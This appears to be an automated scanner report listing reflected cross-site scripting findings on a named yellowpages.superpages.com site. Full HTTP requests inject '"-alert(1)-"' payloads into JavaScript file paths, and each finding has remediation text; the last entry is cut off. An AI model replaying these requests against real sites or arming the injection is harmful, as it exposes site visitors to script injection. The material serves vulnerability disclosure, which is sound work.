GET /commonbae19"-alert(1)-"9957299e054/js/browser_check.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67314"-alert(1)-"4d0383f1bcf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js67314"-alert(1)-"4d0383f1bcf/browser_check.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4823"-alert(1)-"6b96276b57d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/browser_check.jsb4823"-alert(1)-"6b96276b57d HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa65f"-alert(1)-"34ef4e6041c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonaa65f"-alert(1)-"34ef4e6041c/js/iepopup.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7547e"-alert(1)-"e77ecaba831 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js7547e"-alert(1)-"e77ecaba831/iepopup.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57121"-alert(1)-"a019059d18b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/iepopup.js57121"-alert(1)-"a019059d18b HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12235"-alert(1)-"2aa4880554e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common12235"-alert(1)-"2aa4880554e/js/jquery-1.4.2.min.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e853"-alert(1)-"4df34621227 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js6e853"-alert(1)-"4df34621227/jquery-1.4.2.min.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c940"-alert(1)-"8d600cbb5e6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/jquery-1.4.2.min.js4c940"-alert(1)-"8d600cbb5e6 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4138"-alert(1)-"d392b5225e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonf4138"-alert(1)-"d392b5225e3/js/jquery-plugins.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc582"-alert(1)-"51b3ea3bf60 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsdc582"-alert(1)-"51b3ea3bf60/jquery-plugins.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fce99"-alert(1)-"1f8bcc299d1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/jquery-plugins.jsfce99"-alert(1)-"1f8bcc299d1 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39dde"-alert(1)-"ad48974274b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common39dde"-alert(1)-"ad48974274b/js/jquery.history_remote.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
...[SNIP]... erv = 'http://yellowpages.superpages.com'; var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/common39dde"-alert(1)-"ad48974274b/js/jquery.history_remote.js?="; var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c965f"-alert(1)-"9b53f386972 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsc965f"-alert(1)-"9b53f386972/jquery.history_remote.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
...[SNIP]... = 'http://yellowpages.superpages.com'; var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/common/jsc965f"-alert(1)-"9b53f386972/jquery.history_remote.js?="; var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfa09"-alert(1)-"556c143ae67 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/jquery.history_remote.jsdfa09"-alert(1)-"556c143ae67 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
var actualUrl = "http://yellowpages.superpages.com/common/js/jquery.history_remote.jsdfa09"-alert(1)-"556c143ae67?="; var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7dc5"-alert(1)-"f36372d39f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commond7dc5"-alert(1)-"f36372d39f5/js/jquery.sptabs.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c12c"-alert(1)-"1659686fb48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js2c12c"-alert(1)-"1659686fb48/jquery.sptabs.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc50d"-alert(1)-"069a0f815e6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/jquery.sptabs.jsfc50d"-alert(1)-"069a0f815e6 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a2a7"-alert(1)-"fc51b2a718c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common9a2a7"-alert(1)-"fc51b2a718c/js/omniture_onclick.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48ee7"-alert(1)-"7ec2f5075e8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js48ee7"-alert(1)-"7ec2f5075e8/omniture_onclick.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df457"-alert(1)-"a7b7f4d7dfe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/omniture_onclick.jsdf457"-alert(1)-"a7b7f4d7dfe HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db562"-alert(1)-"02c46e9b05d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commondb562"-alert(1)-"02c46e9b05d/js/recently_viewed.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 442ba"-alert(1)-"a80008c80c5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js442ba"-alert(1)-"a80008c80c5/recently_viewed.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 470ae"-alert(1)-"830ee1c48fb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/recently_viewed.js470ae"-alert(1)-"830ee1c48fb HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 539eb"-alert(1)-"4cc78ad7314 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common539eb"-alert(1)-"4cc78ad7314/js/s_code.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb37a"-alert(1)-"32622685d4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
